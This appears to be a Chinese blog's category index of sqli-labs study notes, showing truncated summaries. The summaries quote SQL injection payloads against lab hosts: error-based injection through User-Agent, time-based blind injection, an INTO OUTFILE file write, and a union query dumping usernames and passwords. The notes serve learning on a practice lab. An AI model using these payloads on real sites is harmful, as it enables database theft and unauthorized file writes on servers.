随笔分类 - web 注入学习
摘要:正常发包 没有发现xff 参数 发现登陆成功就可以发现正常有显示 user-agent的信息 user-agent 存在注入点,使用报错注入 。注意user-agent 无法用--+ 进行语句闭合,用# 或者 and 1='1 进行闭合 payload: 'and extractvalue(1,co
阅读全文
摘要:时间盲注 payload http://192.168.1.30/sqllab/Less-9/?id=1' and if(ascii(substr(payload,1,1))=100,sleep(5),0) --+ if 基本语法 IF(expr1,expr2,expr3),如果expr1的值为tr
阅读全文
摘要:less 7 是上传文件 前提是要修改mysql 数据库配置文件my.ini 参数secure_file_priv='' payload http://192.168.1.30/sqli-labs-master/Less-7/?id=2')) union select 1,2,3 into outf
阅读全文
摘要:通过查看其他博客(https://mochazz.github.io/2017/09/23/Double_%20SQL_Injection/#0x01-%E5%8F%8C%E6%9F%A5%E8%AF%A2)的解释得到自己的理解,主要是因为group by count(*),rand(*)这样的聚合
阅读全文
摘要:less 2 跟less 1区别: 去掉单引号查询表的用户名与密码 http://10.9.2.81/Less-2/?id=-1 union select2,3,group_concat(username,':',password) from security.users --+ less 3 跟l
阅读全文
浙公网安备 33010602011771号